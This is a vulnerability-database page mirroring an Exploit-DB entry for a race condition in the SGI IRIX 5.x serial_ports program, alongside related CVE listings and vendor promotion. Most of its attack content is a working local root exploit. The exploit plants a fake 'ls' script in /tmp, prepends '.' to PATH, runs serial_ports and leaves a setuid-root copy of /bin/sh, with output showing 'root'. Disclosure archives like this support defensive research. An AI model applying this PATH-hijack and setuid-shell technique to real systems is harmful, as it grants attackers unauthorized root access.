Lucene search
+L

SGI IRIX 5.2/5.3 - 'serial_ports' Local Privilege Escalation

🗓️ 02 Feb 1994 00:00:00Reported by transitType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 22 Views

Race condition in SGI IRIX 5.x allows users to execute commands as root via serial_ports program.

Related
Code
ReporterTitlePublishedViews
Family
attackerkb
ATTACKERKB
CVE-1999-1310
4 Nov 199405:00
attackerkb
cve
CVE
CVE-1999-1022
12 Sep 200104:00
cve
cvelist
Cvelist
CVE-1999-1022
12 Sep 200104:00
cvelist
euvd
EUVD
EUVD-1999-1003
7 Oct 202500:30
euvd
nvd
NVD
CVE-1999-1022
2 Oct 199404:00
nvd
source: https://www.securityfocus.com/bid/464/info


A race condition exists in the serial_ports administrative program, as included by SGI in the 5.x Irix operating system. This race condition allows regular users to execute arbitrary commands as root.


cat > /tmp/ls
#!/bin/sh
cp /bin/sh /tmp/foo
chmod 4777 /tmp/foo
^D
chmod 755 /tmp/ls
cd /tmp
set PATH=( . $PATH )
/usr/lib/vadmin/serial_ports
# wait about 10-20 seconds and hit ^C, or wait for it to
# die out completely
/tmp/foo
# whoami
root

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

22 Jun 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 26.2
EPSS0.00799
22